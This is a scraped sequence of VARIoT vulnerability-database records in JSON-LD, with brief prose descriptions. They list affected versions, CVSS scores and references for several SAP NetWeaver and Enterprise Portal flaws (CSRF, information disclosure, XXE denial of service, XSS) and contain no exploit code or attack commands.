"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:02:36.162000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://erpscan.com/advisories/dsecrg-12-051-sap-netweaver-mmc-csrf/"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "BID",
"id": "57653"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "57653"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-13T00:00:00",
"db": "BID",
"id": "57653"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-13T00:00:00",
"db": "BID",
"id": "57653"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "57653"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver MMC Cross Site Request Forgery Vulnerability",
"sources": [
{
"db": "BID",
"id": "57653"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "57653"
}
],
"trust": 0.3
}
}
var-201706-1158
Vulnerability from variot
SAP NetWeaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201706-1158",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "99054"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "99054"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an information-disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.",
"sources": [
{
"db": "BID",
"id": "99054"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "99054",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "99054"
}
]
},
"id": "VAR-201706-1158",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:57:41.402000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2445033"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/06/13/sap-security-patch-day-june2017/"
}
],
"sources": [
{
"db": "BID",
"id": "99054"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "99054"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-13T00:00:00",
"db": "BID",
"id": "99054"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-13T00:00:00",
"db": "BID",
"id": "99054"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "99054"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Message Server Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "99054"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "99054"
}
],
"trust": 0.3
}
}
var-201311-0361
Vulnerability from variot
The SHSTI_UPLOAD_XML function in the Application Server for ABAP (AS ABAP) in SAP NetWeaver 7.31 and earlier allows remote attackers to cause a denial of service via unspecified vectors, related to an XML External Entity (XXE) issue. This case XML External entity (XXE) Vulnerability related to the problem.Service disruption by a third party (DoS) There is a possibility of being put into a state. Exploiting these issues may allow a remote attacker to bypass certain security restrictions and perform unauthorized actions or cause denial-of-service conditions. This may lead to further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0361",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "lte",
"trust": 1.8,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.03"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "4.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "6.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.31"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005194"
},
{
"db": "NVD",
"id": "CVE-2013-6815"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-286"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:sp8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:sp15:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:4.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.31",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.03:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:6.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6815"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nikolay Mescherin, ERPScan",
"sources": [
{
"db": "BID",
"id": "63779"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6815",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2013-6815",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6815",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201311-286",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005194"
},
{
"db": "NVD",
"id": "CVE-2013-6815"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-286"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The SHSTI_UPLOAD_XML function in the Application Server for ABAP (AS ABAP) in SAP NetWeaver 7.31 and earlier allows remote attackers to cause a denial of service via unspecified vectors, related to an XML External Entity (XXE) issue. This case XML External entity (XXE) Vulnerability related to the problem.Service disruption by a third party (DoS) There is a possibility of being put into a state. \nExploiting these issues may allow a remote attacker to bypass certain security restrictions and perform unauthorized actions or cause denial-of-service conditions. This may lead to further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6815"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005194"
},
{
"db": "BID",
"id": "63779"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6815",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "55620",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005194",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-286",
"trust": 0.6
},
{
"db": "BID",
"id": "63779",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "63779"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005194"
},
{
"db": "NVD",
"id": "CVE-2013-6815"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-286"
}
]
},
"id": "VAR-201311-0361",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:29:51.933000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005194"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005194"
},
{
"db": "NVD",
"id": "CVE-2013-6815"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/55620"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1890819"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/erpscan-13-020-sap-netweaver-shsti_upload_xml-xxe/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-13-020-sap-netweaver-shsti_upload_xml-xxe/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6815"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6815"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "BID",
"id": "63779"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005194"
},
{
"db": "NVD",
"id": "CVE-2013-6815"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-286"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "63779"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005194"
},
{
"db": "NVD",
"id": "CVE-2013-6815"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-286"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-10-30T00:00:00",
"db": "BID",
"id": "63779"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005194"
},
{
"date": "2013-11-20T14:12:30.913000",
"db": "NVD",
"id": "CVE-2013-6815"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-286"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-21T00:17:00",
"db": "BID",
"id": "63779"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005194"
},
{
"date": "2018-12-10T19:29:01.310000",
"db": "NVD",
"id": "CVE-2013-6815"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-286"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-286"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of ABAP Service interruption in application server (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005194"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-286"
}
],
"trust": 0.6
}
}
var-201709-0206
Vulnerability from variot
Cross site scripting (XSS) vulnerability in SAP Enterprise Portal 7.50 allows remote attackers to inject arbitrary web script or HTML, aka SAP Security Notes 2469860, 2471209, and 2488516. Vendors have confirmed this vulnerability SAP Security Note 2469860 , 2471209 , 2488516 It is released as.Information may be obtained and information may be altered. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. A remote user can conduct cross-site scripting attacks.
The software does not properly filter HTML code from user-supplied input before displaying the input. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the SAP Enterprise Portal, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Link to remedies:
Web Dynpro Java - https://launchpad.support.sap.com/#/notes/2469860 SAPGUI for HTML- https://launchpad.support.sap.com/#/notes/2471209 Web Dynpro ABAP -https://launchpad.support.sap.com/#/notes/2488516
Credits: Imran Khan @Netizen01k reported this vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0206",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "enterprise portal",
"scope": "eq",
"trust": 1.7,
"vendor": "sap",
"version": "7.50"
},
{
"model": "enterprise portal",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "web dynpro abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "gui",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100786"
},
{
"db": "BID",
"id": "100788"
},
{
"db": "BID",
"id": "101068"
},
{
"db": "BID",
"id": "100805"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008516"
},
{
"db": "NVD",
"id": "CVE-2017-10701"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1309"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:enterprise_portal:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.50",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-10701"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100786"
},
{
"db": "BID",
"id": "100788"
},
{
"db": "BID",
"id": "100805"
}
],
"trust": 0.9
},
"cve": "CVE-2017-10701",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-10701",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
